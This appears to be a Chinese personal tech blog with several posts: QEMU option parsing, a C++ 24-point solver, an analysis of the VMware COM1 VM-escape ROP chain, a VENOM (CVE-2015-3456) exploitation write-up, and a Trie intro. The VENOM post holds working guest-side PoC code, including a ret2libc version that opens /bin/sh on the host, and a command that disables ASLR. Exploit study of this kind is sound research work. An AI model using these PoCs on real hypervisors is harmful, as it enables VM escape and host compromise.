typedef struct QEMUOption {
	const char *name;
	int flags;
	int index;
	uint32_t arch_mask;
} QEMUOption;

vl.c中在全局范围定义了一个qemu_options存储了所有的可用选项。

static const QEMUOption qemu_options[] = {
    { "h", 0, QEMU_OPTION_h, QEMU_ARCH_ALL },
#define QEMU_OPTIONS_GENERATE_OPTIONS
#include "qemu-options-wrapper.h"
    { NULL },
};

qemu_options的生成使用QEMU_OPTIONS_GENERATE_OPTIONS编译控制以及一个文件qemu-options-wrapper.h填充。在qemu-options-wrapper.h中，根据是否定义QEMU_OPTIONS_GENERATE_ENUM、QEMU_OPTIONS_GENERATE_HELP以及QEMU_OPTIONS_GENERATE_OPTIONS以及qemu-options.def文件可以生成不同的内容。qemu-options.def是在Makefile中利用scripts/hxtool脚本根据qemu-options.hx文件生成的。

在这里只需要理解，qemu_options中包括了所有可能的参数选项，比如上面的-enable-kvm -smp -realtime -device等。

QEMU将所有参数分成了几个大选项，比如-eanble-kvm和-kernel都属于machine相关的，每一个大选项使用QemuOptsList表示，QEMU在qemu-config.c中定义了

static QemuOptsList *vm_config_groups[48];

这表示可以支持48个大选项。在main函数中用qemu_add_opts将各个QemuOptsList添加到vm_config_groups中

    qemu_add_opts(&qemu_drive_opts);
    qemu_add_drive_opts(&qemu_legacy_drive_opts);
    qemu_add_drive_opts(&qemu_common_drive_opts);
    qemu_add_drive_opts(&qemu_drive_opts);
    qemu_add_opts(&qemu_chardev_opts);
    qemu_add_opts(&qemu_device_opts);
    qemu_add_opts(&qemu_netdev_opts);
    qemu_add_opts(&qemu_net_opts);
    qemu_add_opts(&qemu_rtc_opts);
    qemu_add_opts(&qemu_global_opts);
    qemu_add_opts(&qemu_mon_opts);
    qemu_add_opts(&qemu_trace_opts);
    qemu_add_opts(&qemu_option_rom_opts);
    qemu_add_opts(&qemu_machine_opts);
    qemu_add_opts(&qemu_mem_opts);
    qemu_add_opts(&qemu_smp_opts);
    qemu_add_opts(&qemu_boot_opts);
    qemu_add_opts(&qemu_sandbox_opts);
    qemu_add_opts(&qemu_add_fd_opts);
    qemu_add_opts(&qemu_object_opts);
    qemu_add_opts(&qemu_tpmdev_opts);
    qemu_add_opts(&qemu_realtime_opts);
    qemu_add_opts(&qemu_msg_opts);
    qemu_add_opts(&qemu_name_opts);
    qemu_add_opts(&qemu_numa_opts);
    qemu_add_opts(&qemu_icount_opts);
    qemu_add_opts(&qemu_semihosting_config_opts);
    qemu_add_opts(&qemu_fw_cfg_opts);

每个QemuOptsList存储了大选项支持的所有小选项，比如

static QemuOptsList qemu_realtime_opts = {
    .name = "realtime",
    .head = QTAILQ_HEAD_INITIALIZER(qemu_realtime_opts.head),
    .desc = {
        {
            .name = "mlock",
            .type = QEMU_OPT_BOOL,
        },
        { /* end of list */ }
    },
};

-realtime只支持一个值为bool的子选项，即只能由-realtime mlock=on/off。但是像-device这种选项就没有这么死板了，-device并没有规定必须的选项，因为设备有无数多种，不可能规定得过来，解析就是按照“,”或者“=”来解析的。每个子选项是一个的结构是QemuOpt，定义如下

struct QemuOpt {
    char *name;
    char *str;

    const QemuOptDesc *desc;
    union {
        bool boolean;
        uint64_t uint;
    } value;

    QemuOpts     *opts;
    QTAILQ_ENTRY(QemuOpt) next;
}

name表示子选项的字符串表示，str表示对应的值

QemuOptsList并不是和QemuOpt直接联系，中间还需要有一层QemuOpts，因为比如上面的可以指定两个-device，这个时候他们都在QemuOptsList的链表上，但是是两个QemuOpts，每个QemuOpts又有自己的QemuOpt链表。QemuOpts结构如下

struct QemuOpts {
    char *id;
    QemuOptsList *list;
    Location loc;
    QTAILQ_HEAD(QemuOptHead, QemuOpt) head;
    QTAILQ_ENTRY(QemuOpts) next;
};

大体结构如下：

对应本文用的参数，如下（省略了一些参数，比如-m）

参考：QEMU 2: 参数解析

IBM的这篇文章不太好理解，后面也有错误

输出24点游戏所有解

2015-08-25T00:00:00+00:00

24点游戏，就是选4个数，对其运用加减乘除，得到24，可以使用括号。关于24点游戏的解法，《编程之美》上面说得比较清楚，我这里直接使用第二种解法。这里在合并S集的时候是不应该像书上说的去重的，因为虽然说产生的数一样，但是他们是不同的计算的方式产生的，如果这个时候去重会导致得不出正确的解法个数，正确的去重应该是在最后统计S[15]中24的个数时。下面是运行结果：

#include <iostream>
#include <vector>
#include <set>
#include <algorithm>
#include <iterator>
#include <string>
#include <math.h>

using namespace std;
const double threHold = 1E-6;

struct Node
{
	double value;
	string exp;
	Node(double v, string s) :value(v), exp(s){}
	friend bool operator < (const Node &node1, const Node &node2)
	{
		return node1.value < node2.value;
	}
};

class PointGameSolver
{
public:
	PointGameSolver(initializer_list<double> li) :init(li)
	{
		S = new multiset<Node>[static_cast<int>(pow(2, init.size()))];
	}
	int getResult(set<string>& ans)
	{
		ans.clear();
		calc();
		return check(ans);
	}
	~PointGameSolver()
	{
		delete[] S;
	}
private:
	int check(set<string>& result);
	multiset<Node> setS(int i);
	multiset<Node> getUnion(multiset<Node> a, multiset<Node> b);
	multiset<Node> fork(multiset<Node> a, multiset<Node> b);
	void calc();
	
	multiset<Node>  *S;
	vector<double> init;
};

int PointGameSolver::check(set<string>& result)
{
	int count = 0;
	multiset<Node> ans = S[static_cast<int>(pow(2, init.size()) - 1)];
	for (auto it = ans.begin(); it != ans.end(); ++it)
	{
		if ((it->value - 0) > threHold && fabs(it->value - 24) < threHold)
		{
			count++;
			result.insert(it->exp);
		}
	}
	return result.size();
}
multiset<Node> PointGameSolver::setS(int i)
{
	if (!S[i].empty())
		return S[i];
	for (int x = 1; x < i; ++x)
	{
		if ((x & i) == x)
			S[i] = getUnion(S[i], fork(setS(x), setS(i - x)));
	}
	return S[i];
}
multiset<Node> PointGameSolver::getUnion(multiset<Node> a, multiset<Node> b)
{
	multiset<Node> result;
	copy(a.begin(), a.end(), inserter(result, result.begin()));
	copy(b.begin(), b.end(), inserter(result, result.begin()));
	return result;
}
multiset<Node> PointGameSolver::fork(multiset<Node> a, multiset<Node> b)
{
	if (a.empty())
		return b;
	if (b.empty())
		return a;
	multiset<Node> result;
	for (auto ita = a.begin(); ita != a.end(); ++ita)
	{
		for (auto itb = b.begin(); itb != b.end(); ++itb)
		{
			result.insert(Node(ita->value + itb->value, "(" + ita->exp + "+" + itb->exp + ")"));
			result.insert(Node(ita->value * itb->value, "(" + ita->exp + "*" + itb->exp + ")"));
			result.insert(Node(ita->value - itb->value, "(" + ita->exp + "-" + itb->exp + ")"));
			result.insert(Node(itb->value - ita->value, "(" + itb->exp + "-" + ita->exp + ")"));
			if (!((fabs(ita->value - 0) < threHold)))
			{
				result.insert(Node(ita->value / itb->value, "(" + ita->exp + "/" + itb->exp + ")"));
			}
			if (!((fabs(itb->value - 0) < threHold)))
			{
				result.insert(Node(itb->value / ita->value, "(" + itb->exp + "/" + ita->exp + ")"));
			}

		}
	}
	return result;
}
void PointGameSolver::calc()
{
	size_t n = init.size();
	for (size_t i = 0; i < n; ++i)
	{
		S[static_cast<int>(pow(2, i))].insert(Node(init[i], to_string((int)init[i])));
	}
	for (size_t i = 1; i < pow(2, n); ++i)
	{
		S[i] = setS(i);
	}
}

bool isValid(int *a, int n)
{
	for (int i = 0; i < n; ++i)
	{
		if (a[i] < 1 || a[i] > 10)
			return false;
	}
	return true;
}
int _tmain(int argc, _TCHAR* argv[])
{
	int data[4];
	while (1)
	{
		cout << "请输入4个数（1-10，空格隔开）：";
		int i = 0;
		while (cin >> data[i++])
		{
			if (i == 4)
				break;
		}
		if (cin && isValid(data, 4))
		{
			PointGameSolver pgs({ (double)data[0], (double)data[1], (double)data[2], (double)data[3] });
			set<string> ans;
			int count = pgs.getResult(ans);
			if (!count)
			{
				cout << "no solution\n";
			}
			else
			{
				cout << "total solutions :" << count << endl;
				for_each(ans.begin(), ans.end(), [](const string &s) {cout << s << endl; });
			}
		}
		else
			cout << "invalid input \n";
		cout << "\n";

		cout << "continue?(y/n):";
		if (!cin)
			cin.clear();
		cin.ignore(numeric_limits<streamsize>::max(), '\n');
		string str;
		cin >> str;
		if (str != "Y" && str != "y")
			break;
	}

	return 0;
}

竟然有人看到了文末，那就扯点别的。这是UCloud的面试题，昨晚接到UCloud面试官的电话，简单说了下他们是做网络虚拟化的，问有没有兴趣。随意聊了一下，然后就在我准备接受一番血虐的时候，他直接就给我整个这个题，太直接了好嘛，有一种dota里面的“生死看淡，不服就干”的味道。然后我当然就查资料了，发现竟然是编程之美上面的，然后看了下思路，顺着书上的框架写好代码，完工之后才发现还要输出所有解。想了一会，之前想到甚至用tuple来保存表达式，后来想到还是直接string简单点，把multiset，换成了multiset了，Node里面包括了值和产生此值的表达式，看起来也还算不错。

VMware COM1虚拟机逃逸漏洞分析

2015-08-04T00:00:00+00:00

本文是对谷歌的文章Escaping VMware Workstation through COM1中提及的漏洞利用的分析。

##1. 背景简介

VMware为了方便，提供在虚拟机中打印文件并保存在宿主机中，默认将Microsoft XPS Document Writer作为打印机。COM1端口用于和Host的vprintproxy.exe进行交互。当Guest打印文件时，会将EMFSPOOL和EMF文件交给vprintproxy.exe进行处理，由于vprintproxy.exe的TPView.dll存在一个缓冲区漏洞，畸形构造的打印文件会导致vprintproxy.exe被控制，进而造成宿主机任意代码执行。

##2. 漏洞复现

环境：host win8.1, guest win7，VMWare 11.1.0 build-2496824，python版本为3.4.3。根据文档和分析，基本上只要TPView.dll为8.8.856.1版和iconv.dll为1.9.0.1版即可复现该漏洞。

工具：ida 6.5，x64dbg(这次用的是其32位版本x32dbg)

首先，看看正常的功能是怎么样的，在虚拟机中打开一个正常文件，选择下图所示的打印机，即可将虚拟机中的文档打印到宿主机中。

在虚拟机中执行python.exe poc（poc为谷歌文末给的代码），看到vprintproxy.exe成功创建了计算器进程，下图所示。

##3. 总体分析

总体流程图如下图所示。

谷歌给的exp中与漏洞利用有关的主要是overflow部分和SHELLCODE部分。overflow负责淹没缓冲区以及布置各个gadget，大致分为2个部分，按照运行的流程分别叫做第一段和第二段。SHELLCODE则完成实际功能，可以是任何能够在win 8.1运行的shellcode。

第一段的首先4个字节（图中first eip）是覆盖ret控制eip的第一步，第一段的主要工作就是在0x1010ff00放置好VirtualAlloc - edi的差值,为0x00078c48，方便以后动态得到VirtualAlloc的地址，这里在漏洞触发点曝出的edi的值可以说是非常重要的。第一段还有一个作用就是将栈顶抬高到overflow前四个字节，然后去执行第二段。这里分两段的原因是第一段中由于触发漏洞需要有几个特殊的点布置特殊的数据，这些会跟first eip及之后的几个gadget的布局冲突。

第二段的主要工作就是动态得到VirtualAlloc的地址，分配0x10000个字节的可执行的内存区域，然后在0x40000000的前0xC个字节处布置特殊的指令，然后跳到0x40000000处执行。

0x40000000处将已经读入内存的SHELLCODE以及其他数据拷贝到0x40000010处开始的地址处，然后跳到0x40000200处执行，0x40000200经过一段nop指令后顺利滑到了SHELLCODE的地方。

由于整个进程地址空间实际只有1个iconv.dll为被随机化加载，如图4所示，可以利用的gadget非常不丰富，ROP的构造展现出了特别精妙的艺术。

##4. 详细分析

###4.1 覆盖返回地址

在谷歌的文档中，我们知道溢出的位置是在距离TPView.dll加载基址0x48788处，根据实际加载的基址，我们找到溢出的位置在0x03208788处，x32dbg中下图所示。

经过分析，在0x03208797的处的call会每次拷贝2个字节到esp+48（eip在0x0320879时）的位置，图6显示了已经拷贝了8个字节的情况（由于栈随机化，实际情况以dbg里面的为准）。

对应的是exp中的overflow的开始部分，拷贝次数在ebx中，为0xAC，也就是理论上可以拷贝的字节为0xAC*2=0x158个字节，而拷贝0x4C以上的字节的时候会导致缓冲区溢出，淹没返回地址。直接运行到之后的0x032087ba，此时栈的已经被全部被exp中的overflow覆盖了。继续往下走，在0x03208882处有一个从esp+118读数据到edx，后面会将该数与其加1之后的结果比较作为分支方向（即0x032088a5处），这里必须保证能够跳转成功，所以布局overflow的时候需要在esp+118这个位置放上0x7fffffff。接着往下走，到0x032089f8处，需要从eps+110处读四个字节到edx,在0x03208a01处有向这个edx内存写数据的指令，所以这个地址需要是可写的，这就是exp中的WRITABLE为1010ff00的原因，这是iconv.dll的.idata空间,注意这里edx=0x1010ff00，之后一直没有变过。由于有这两个原因以及之后的控制eip之后的操作，布局无法向常规一样，像流水线一样一直往下走。文章中使用了比较巧妙的办法，先布局shellcode的一部分，然后将栈抬高，接着执行shellcode的第二部分。

###4.2 overflow第二段代码执行

从0x03208adf处ret之后，就到了我们第一个eip处0x1001cae4，这是跳向InterlockedExchange的指令，注意这个点的edi，edi的值与保存VirtualAlloc函数地址的值紧密相关。该exp大量使用InterlockedExchange来布置数据，技巧性相当高。现在控制流程到了0x74ec2520，很容易看出这是在交换[ecx]和eax的数据，eax和ecx分别取自esp+C和esp+8。ecx为0x1010ff00，eax为0xf4，这个0xf4就是从overflow开始到结束的距离，待会会利用这个数据直接将流程控制点到overflow的顶部。紧接着ret，到了0x1001c595，只是将之前的0x1010ff00弹出，接着ret还是0x1001c595，弹出之前的数据。现在eip又到了0x1001cae4，这次交换的数据是eax=0x00078c48和地址ecx=0x1010ff00处的数据，这也是特别巧妙的，可谓是一举两得，eax变成了0xf4作为之后调用_alloca_probe的参数，而0x1010ff00处的值0x00078c48与edi相加之后正好为存有VirtualAlloc函数地址的地址。在这个0x1001cae4返回之后到达0x1001c1e0，这就是_alloca_probe函数的地址，该函数将栈抬高eax字节，此时esp-f4即可到达overflow的前4个字节，由于在0x1001c1fb处，eax和esp交换，所以这时eax的值为老的esp,之后eax的值esp处的值，即overflow的最底部的值0x1001cae4，然后赋给栈顶，此时的栈顶已经在overflow第一段的前四个字节了。到0x1001c201返回ret直接到了0x1001cae4。这时开始执行overflow的第一部分shellcode代码。

###4.3 overflow第一段代码执行

最开始执行由4.2末尾设置在0x1001cae4的代码，也就是InterlockedExchange的指令，这次是将0x10110284的值设为0x1001c594，0x10110284为_io_func的函数地址，这个作用后面叙述。从这个gadget返回之后到了0x1001c94c，将edx的值放入eax之后返回（注意,edx自从被置为1010ff00之后没有变过，所以此时eax为1010ff00）。这个时候到了0x100010b1，在0x100010b4会调用call [100110284]，0x100110284地址处的值已经被替换成了0x1001c594，这个gadget什么也没做，接着到了0x1001c594，也只是到达下一个gadget。现在到了0x1000cb5c,这是dec eax，紧接着到达0x10003d43，这个指令add dword ptr ds:[eax+1],edi，正好将0x1010ff00的值设为0x00078c48+edi = 0x032812d8,这个值就是存放的就是存放VirtualAlloc地址的地址，注意这里由于0x10003d94的指令还将栈抬高了0x10个字节，所以现在又ret到了0x1001c594。这里弹出几个之前的布局，到了0x10001116将0x1010fef8弹到了ebp中，0x1001c120将ebp+8即1010ff00处的值放到eax中。之后到了0x10010b1处的gadget，这里调call [10110284],也是弹出之前需要的布局数据。然后到了0x1001c1fc，这个gadget将VirtualAlloc的地址（在eax中）放入[esp]，然后ret，根据在stack布置好的参数，就在0x40000000处分配了0x10000大小的空间，并且可执行。接下来又是3次跳到0x1001cae4，这个gadget已经很熟了，这里就是将新开辟的0x40000000的开始0xC个字节放入0x8b24438b和0x0xa4f21470,0x01f3e9。然后跳到0x40000000开始执行。

###4.4 执行SHELLCODE

这0xC个字节是组成4条指令，将内存中的[esi]处的数据复制到0x40000010处，[esi]之中就包括了SHELLCODE部分，之后jmp 0x40000200，进入一段nop滑板之后就执行了SHELLCODE。

##5. 总结

该漏洞有两个地方我认为是难点，第一是EMFSPOOL、EMF和JPEG2000的文件格式，需要构造触发漏洞的poc并不容易。第二是漏洞的利用，由于该漏洞可以使用的gadget来源仅有icov.dll，所以ROP链的构造非常不容易，从第四部分的分析也看出了，overflow被迫分为两段，然后栈的忽而抬升，忽而下降，布局溢出数据需要考虑栈提升的前后两个方面的情况，技巧性特别高。总之我认为这是一个基本完美的利用。从VENOM和这个漏洞可以看出，虚拟化漏洞（特别是虚拟机逃逸）这种一般都是在跟主机打交道的时候发生的。KVM中，vm exit进入kvm内核处理的过程，以及kvm分发io给qemu的时候应该是发生漏洞的主要场景。由于docker依靠的是linux内核提供的隔离机制，内核出现漏洞，出事的概率特别大。

VENOM漏洞分析与利用

2015-06-26T00:00:00+00:00

本文主要是对VENOM漏洞的原理进行分析，并且在关ASLR的情况下利用ret2lib的方式进行了利用。本文实验环境为Ubuntu 12.04 x86，kernel 3.2.57 ，qemu版本为2.2.0-rc1，实验室现成的开发机环境。

##1. 漏洞简介

VENOM，CVE-2015-3456是由CrowdStrike的Jason Geffner发现的存在于QEMU虚拟软驱中的漏洞。由于QEMU的设备模型被KVM、Xen等虚拟化软件广泛使用，影响还是比较大的，攻击者利用该漏洞能够使虚拟机逃逸，在宿主机中执行代码。

##2. 漏洞触发

根据mj提交在360官方技术Blog上的文章，原始poc可能会对触发有影响，我这里也没成功，就用了文中的poc。（下文有些内容也是从该文中学习的，有些重复只是为了保证本文完整性）运行poc之后，虚拟机进程崩溃。第一版poc及崩溃效果如下:

#include <sys/io.h>
#include <stdio.h>

#define FIFO 0x3f5

int main()
{
	int i;
	iopl(3);
	outb(0x08e,0x3f5);
	for(i = 0;i < 10000000;i++)
		outb(0x42,0x3f5);
	return 0;
}

eip的值为42424242，猜测eip可以控制。下面结合mj的文章对漏洞做简要分析。

##3. 漏洞分析

如poc中所示，除了iopl调用获得对端口的操作权限以外，qemu都在执行outb指令，这会引发vm exit，陷入内核中，交给kvm模块处理，kvm模块会将该io操作派给qemu处理，大致流程就是这样，代码层面的分析此处略（我个人也不敢说完全懂）。在poc中，都是在向DATA_FIFO端口写数据。在qemu源代码中hw/block/fdc.c文件中:

static const struct {
    uint8_t value;
    uint8_t mask;
    const char* name;
    int parameters;
    void (*handler)(FDCtrl *fdctrl, int direction);
    int direction;
} handlers[] = {
    { FD_CMD_READ, 0x1f, "READ", 8, fdctrl_start_transfer, FD_DIR_READ },
    { FD_CMD_WRITE, 0x3f, "WRITE", 8, fdctrl_start_transfer, FD_DIR_WRITE },
    { FD_CMD_SEEK, 0xff, "SEEK", 2, fdctrl_handle_seek },
    { FD_CMD_SENSE_INTERRUPT_STATUS, 0xff, "SENSE INTERRUPT STATUS", 0, fdctrl_handle_sense_interrupt_status },
    { FD_CMD_RECALIBRATE, 0xff, "RECALIBRATE", 1, fdctrl_handle_recalibrate },
    { FD_CMD_FORMAT_TRACK, 0xbf, "FORMAT TRACK", 5, fdctrl_handle_format_track },
    { FD_CMD_READ_TRACK, 0xbf, "READ TRACK", 8, fdctrl_start_transfer, FD_DIR_READ },
    { FD_CMD_RESTORE, 0xff, "RESTORE", 17, fdctrl_handle_restore }, /* part of READ DELETED DATA */
    { FD_CMD_SAVE, 0xff, "SAVE", 0, fdctrl_handle_save }, /* part of READ DELETED DATA */
    { FD_CMD_READ_DELETED, 0x1f, "READ DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_READ },
    { FD_CMD_SCAN_EQUAL, 0x1f, "SCAN EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANE },
    { FD_CMD_VERIFY, 0x1f, "VERIFY", 8, fdctrl_start_transfer, FD_DIR_VERIFY },
    { FD_CMD_SCAN_LOW_OR_EQUAL, 0x1f, "SCAN LOW OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANL },
    { FD_CMD_SCAN_HIGH_OR_EQUAL, 0x1f, "SCAN HIGH OR EQUAL", 8, fdctrl_start_transfer, FD_DIR_SCANH },
    { FD_CMD_WRITE_DELETED, 0x3f, "WRITE DELETED DATA", 8, fdctrl_start_transfer_del, FD_DIR_WRITE },
    { FD_CMD_READ_ID, 0xbf, "READ ID", 1, fdctrl_handle_readid },
    { FD_CMD_SPECIFY, 0xff, "SPECIFY", 2, fdctrl_handle_specify },
    { FD_CMD_SENSE_DRIVE_STATUS, 0xff, "SENSE DRIVE STATUS", 1, fdctrl_handle_sense_drive_status },
    { FD_CMD_PERPENDICULAR_MODE, 0xff, "PERPENDICULAR MODE", 1, fdctrl_handle_perpendicular_mode },
    { FD_CMD_CONFIGURE, 0xff, "CONFIGURE", 3, fdctrl_handle_configure },
    { FD_CMD_POWERDOWN_MODE, 0xff, "POWERDOWN MODE", 2, fdctrl_handle_powerdown_mode },
    { FD_CMD_OPTION, 0xff, "OPTION", 1, fdctrl_handle_option },
    { FD_CMD_DRIVE_SPECIFICATION_COMMAND, 0xff, "DRIVE SPECIFICATION COMMAND", 5, fdctrl_handle_drive_specification_command },
    { FD_CMD_RELATIVE_SEEK_OUT, 0xff, "RELATIVE SEEK OUT", 2, fdctrl_handle_relative_seek_out },
    { FD_CMD_FORMAT_AND_WRITE, 0xff, "FORMAT AND WRITE", 10, fdctrl_unimplemented },
    { FD_CMD_RELATIVE_SEEK_IN, 0xff, "RELATIVE SEEK IN", 2, fdctrl_handle_relative_seek_in },
    { FD_CMD_LOCK, 0x7f, "LOCK", 0, fdctrl_handle_lock },
    { FD_CMD_DUMPREG, 0xff, "DUMPREG", 0, fdctrl_handle_dumpreg },
    { FD_CMD_VERSION, 0xff, "VERSION", 0, fdctrl_handle_version },
    { FD_CMD_PART_ID, 0xff, "PART ID", 0, fdctrl_handle_partid },
    { FD_CMD_WRITE, 0x1f, "WRITE (BeOS)", 8, fdctrl_start_transfer, FD_DIR_WRITE }, /* not in specification ; BeOS 4.5 bug */
    { 0, 0, "unknown", 0, fdctrl_unimplemented }, /* default handler */
};

与poc有关的FIFO命令为：

FD_CMD_DRIVE_SPECIFICATION_COMMAND = 0x8e

另一个42是作为该命令的参数传递给handler的，这里是

fdctrl_handle_drive_specification_command

当qemu接到了FIFO命令之后，通过命令ID找到找到handlers数组中位置，然后根据参数个数继续接受参数，将命令ID和参数放到一个buffer中。当参数接受完了之后，调用相应的处理函数。整个FIFO写操作都在fdctrl_write_data函数中。

static void fdctrl_write_data(FDCtrl *fdctrl, uint32_t value)
{
...
	//处理命令
    if (fdctrl->data_pos == 0) {
        /* Command */
        pos = command_to_handler[value & 0xff];
        FLOPPY_DPRINTF("%s command\n", handlers[pos].name);
        fdctrl->data_len = handlers[pos].parameters + 1;
        fdctrl->msr |= FD_MSR_CMDBUSY;
    }

    //将命令和参数保存在fdctrl->fifo中
    fdctrl->fifo[fdctrl->data_pos++] = value;
    if (fdctrl->data_pos == fdctrl->data_len) {
        /* We now have all parameters
         * and will be able to treat the command
         */
        if (fdctrl->data_state & FD_STATE_FORMAT) {
            fdctrl_format_sector(fdctrl);
            return;
        }

        pos = command_to_handler[fdctrl->fifo[0] & 0xff];
        FLOPPY_DPRINTF("treat %s command\n", handlers[pos].name);
        (*handlers[pos].handler)(fdctrl, handlers[pos].direction);
    }
}

当所需的参数收集完了之后，调用对应的处理函数，8e对应的是fdctrl_handle_drive_specification_command:

static void fdctrl_handle_drive_specification_command(FDCtrl *fdctrl, int direction)
{
    FDrive *cur_drv = get_cur_drv(fdctrl);

    if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x80) {
        /* Command parameters done */
        if (fdctrl->fifo[fdctrl->data_pos - 1] & 0x40) {
            fdctrl->fifo[0] = fdctrl->fifo[1];
            fdctrl->fifo[2] = 0;
            fdctrl->fifo[3] = 0;
            fdctrl_set_fifo(fdctrl, 4);
        } else {
            fdctrl_reset_fifo(fdctrl);
        }
    } else if (fdctrl->data_len > 7) {
        /* ERROR */
        fdctrl->fifo[0] = 0x80 |
            (cur_drv->head << 2) | GET_CUR_DRV(fdctrl);
        fdctrl_set_fifo(fdctrl, 1);
    }
}

通过控制传入fifo中的数据我们绕过这两个if判断语句，也就不会有fdctrl_set_fifo和fdctrl_reset_fifo的调用，这两个函数正是对fifo缓冲区进行清空和控制是否可写的函数。这样就能够调用outb无限向fifo缓冲区写数据，fifo是通过malloc分配的512字节空间，当超过512就会覆盖其他的数据，造成程序崩溃。

##4. eip定位

一般情况下，进程的堆离代码段是非常远的，并且heap在高地址空间而text在低地址空间，更不可能直接通过溢出堆空间修改eip。该漏洞通过堆溢出覆盖了eip，估计是覆盖了堆中动态分配的某些数据结构，这些数据结构会影响到eip。linux下面没有找到类似Immunity dbg的神器，要么自己写pattern文件定位eip，要么手工。由于实验用的虚拟机没弄网络，自己拷文件进去比较麻烦，就自己手工定位eip了。用二分法定位了20多分钟基本就知道大概1550个字节左右就会触发漏洞。这里有一个问题，导致我最开始以为eip不稳定。每次触发漏洞之后会导致poc被删除，然后我再开启虚拟机运行那个已经没有内容的poc，当然不会触发漏洞了（关于这个问题，后面会再说）。覆盖eip的位置大致定了之后就上gdb了，通过调试，最后确定1516个字节之后的4个字节就是覆盖eip的位置。poc第二版及崩溃后的eip截图如下：

#include <sys/io.h>
#include <stdio.h>

#define FIFO 0x3f5


int main()
{
	int i;
	iopl(3);
	outb(0x08e,0x3f5);
	for(i = 0;i < 1515;i++)
		outb(0x42,0x3f5);
	for(i = 0;i < 4;i++)
		outb(0x43,0x3f5);
	for(i = 0;i < 50;++i)
		outb(0x44,0x3f5);
	return 0;
}

我们看到进程如期崩溃，eip为43434343，定位精准。

##5. 原理分析

如第四部分所言，单纯的覆盖堆缓冲区是不能直接覆盖到eip的。本部分对覆盖到eip的原因进行分析。 gdb启动qemu进程，设置参数之后开始run，在虚拟机里面运行poc。

虚拟机如期崩溃，bt显示最后一个函数是在async.c文件里面的aio_bh_poll里面82行。

aio_bh_poll 82行调用的是bh->cb(bh->opaque);，这条语句调用的是QEMUBH结构体中的保存的一个回调函数，现在情况就比较明了了，QEMUBH内部通过next形成的链表，每个QEMUBH的内存空间通过malloc分配在虚拟机对应的进程堆上面，挨着fdctrl->fifo的一个QEMUBH被覆盖了，导致aio_bh_poll执行里面的callback的时候遇到错误的eip地址。经过分析，大概的图如下:

在分析该部分的时候，了解了一下，aio的poll是在主线程里面做的，专门处理某种block的IO。

##6. 漏洞利用

知道了漏洞的细节之后，下一步就是利用了。qemu程序非常大，堆里面申请的数据非常多，基本上可以说对加载的payload大小没啥限制。对eip的完全控制和payload几乎没有限制，如果能够过掉ASLR和DEP，相信会是一个非常完美的利用，利用虚拟机进程执行任意代码。第一次写Linux的exp，对linux的ASLR和DEP绕过技术不太熟（Windows也好久不搞了，不过我记得方法是不少的），在网上找了好久Linux进行ROP的文章，但是都太老了，在所有模块加载基址都随机化的情况下，感觉需要针对具体漏洞的特定得到模块或者某个函数的地址，才能进一步走下去。于是，我就只能关掉了ASLR。

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

暂时不考虑过ASLR，就简单利用ret2lib，通过system去执行/bin/sh。之前考虑怎么布置参数，本来想着可能还要转换栈的，后来灵光一下，发现覆盖的那个callback后面就是其参数。太巧了，只需要找到/bin/sh的地址布置在eip之后就可以了。下图为寻找system函数和”/bin/sh”字符串的过程。

下面是poc的第三版

#include <sys/io.h>
#include <stdio.h>

#define FIFO 0x3f5


int main()
{
	int i;
	iopl(3);
	outb(0x08e,0x3f5);
	for(i = 0;i < 1515;i++)
		outb(0x42,0x3f5);
	outb(0x10,0x3f5);
	outb(0xce,0x3f5);
	outb(0xe6,0x3f5);
	outb(0xb7,0x3f5);
	outb(0xb8,0x3f5);
	outb(0x50,0x3f5);
	outb(0xe1,0x3f5);
	outb(0xb7,0x3f5);
	for(i = 0;i < 50;++i)
		outb(0x44,0x3f5);
	return 0;
}

最后的poc效果如下，先在虚拟机中运行poc，然后宿主机中对应的qemu进程开启了/bin/sh。

##7. 遗留问题

poc在虚拟机运行期间只能执行一次，再次开机运行需要重新编译。最开始进行漏洞重现的时候，有的时候能崩溃，有的时候不能，以为eip被覆盖的位置不能准确定位（毕竟溢出heap上再加上ASLR）。后来发现是因为每次运行poc之后，poc里面的内容都会被清0，啥都没有，再次开启虚拟机执行，当然不能成功。所以每次都要重新编译一次。后来想了一下，估计是虚拟机崩溃时候，内核的状态有问题，导致正在运行的进程image会被清空，后来写了个while(1)死循环的test程序执行，然后运行poc，test程序文件果然被清空了，算是验证了猜想。感觉这个确实很棘手，但是并不好解决，想到的一个猥琐方案是，运行poc之前把自己复制一份。
ASLR的问题。感觉只要能够bypass ASLR，剩下ROP链的构造应该问题不大，应该能够达到执行任意代码的目的。所以这个漏洞还是有点厉害。

##8. 遇到的问题及解决

定位eip。linux方面没写自己手动写过exp，只用过metasploit工具，以前Windows都是Immunity debugger找eip，这里只能用二分法大概试。
试着在heap上部署过shellcode，payload的中间有的字节有时会被覆盖，估计是进程在处理堆的时候，会操作一些数据，以后部署的时候要注意。

##9. 参考

VENOM “毒液”漏洞分析（qemu kvm CVE‐2015‐3456）

顺便说一句360的技术Blog是非常不错的，从上面mj,pjf,wowocock等大牛那里学到很多东西。

一步一步学ROP之linux_x86篇

Trie树与Word Puzzles

2014-11-07T00:00:00+00:00

最近看书遇到一个word puzzles问题，大概的意思就是给定一个字母方阵和一些单词，在这个字母方阵中找出这些单词，可以是横、竖、斜对应的8个方向。比如给出如下的方阵如几个单词（这是一个OJ题）：

MARGARITA, ALEMA, BARBECUE, TROPICAL, SUPREMA, LOUISIANA, CHEESEHAM, EUROPA, HAVAIANA, CAMPONESA

上面标出了前面3个单词。

最简单的就是暴力匹配了，对每一个单词遍历一下方阵。但是很明显效率受不了，网上学习了一下，Trie树是解决这个问题的很好的方案。下面先简要介绍一下Trie树。

Trie树简介

Trie树，又称字典树，单词查找树或者前缀树，是一种用于快速检索的多叉树结构，如英文字母的字典树是一个26叉树，数字的字典树是一个10叉树。Trie典型应用是用于统计和排序大量的字符串（但不仅限于字符串），所以经常被搜索引擎系统用于文本词频统计。它的优点是：最大限度地减少无谓的字符串比较，查询效率比哈希表高。

Trie树可以利用字符串的公共前缀来节约存储空间。如下图所示，该trie树用10个节点保存了6个字符串tea，ten，to，in，inn，int：

Trie树的基本性质可以归纳为：

根节点不包含字符，除根节点意外每个节点只包含一个字符。
从根节点到某一个节点，路径上经过的字符连接起来，为该节点对应的字符串。
每个节点的所有子节点包含的字符串不相同。

